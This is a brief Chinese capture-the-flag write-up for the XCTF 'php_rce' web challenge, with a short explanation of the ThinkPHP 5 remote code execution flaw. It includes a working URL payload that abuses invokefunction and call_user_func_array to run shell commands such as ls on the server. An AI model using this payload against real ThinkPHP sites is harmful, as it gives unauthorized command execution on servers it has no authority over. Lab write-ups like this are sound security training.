文章目录
- 一、php_rce
- 二、使用步骤
- 1.点击获取在线场景
- 2.thinkphp5 rce漏洞
- 总结
一、php_rce
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1
二、使用步骤
1.点击获取在线场景
2.thinkphp5 rce漏洞
构造payload
执行ls命令查看当前目录文件
代码语言:javascript复制?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("ls");'
当前目录没有flag文件,寻找flag
查看flag
flag为:flag{thinkphp5_rce}
总结
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。